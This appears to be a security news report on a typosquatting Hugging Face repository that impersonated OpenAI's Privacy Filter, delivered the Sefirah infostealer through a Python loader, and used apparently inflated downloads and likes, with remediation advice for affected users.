A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter reached number 1 on the platform’s trending list. The fake repository named Open-OSS/privacy-filter accumulated 244,000 downloads and 667 likes within 18 hours before removal. However, HiddenLayer researchers discovered the typosquatting campaign on May 7 after noticing suspicious activity on the platform.
The malicious repository copied OpenAI’s legitimate Privacy Filter model card nearly verbatim to trick users. Meanwhile, a loader.py file fetched and executed Rust-based information stealer malware called Sefirah on Windows machines. As a result, the malware targeted browser data, Discord tokens, cryptocurrency wallet information, and stored credentials from infected systems.
OpenAI released the legitimate Privacy Filter in April 2026 under Apache 2.0 license on GitHub. The model detects and redacts personally identifiable information in unstructured text for privacy protection. Additionally, the bidirectional token classifier features 1.5 billion parameters and supports context windows up to 128,000 tokens.
HiddenLayer suspects the download count and likes were artificially inflated to create trust illusions. Furthermore, the vast majority of the 667 accounts that liked the repository appear to be auto-generated. Consequently, researchers uncovered six more repositories featuring similar Python loaders deploying the same stealer infrastructure.
The campaign shows overlaps with an npm typosquatting operation distributing WinOS 4.0 implant malware. Moreover, HiddenLayer traced command-and-control servers to welovechinatown.info domain previously used in ValleyRAT campaigns. Therefore, users who downloaded files from the malicious repository should reimage machines, rotate credentials, and replace cryptocurrency wallets immediately.
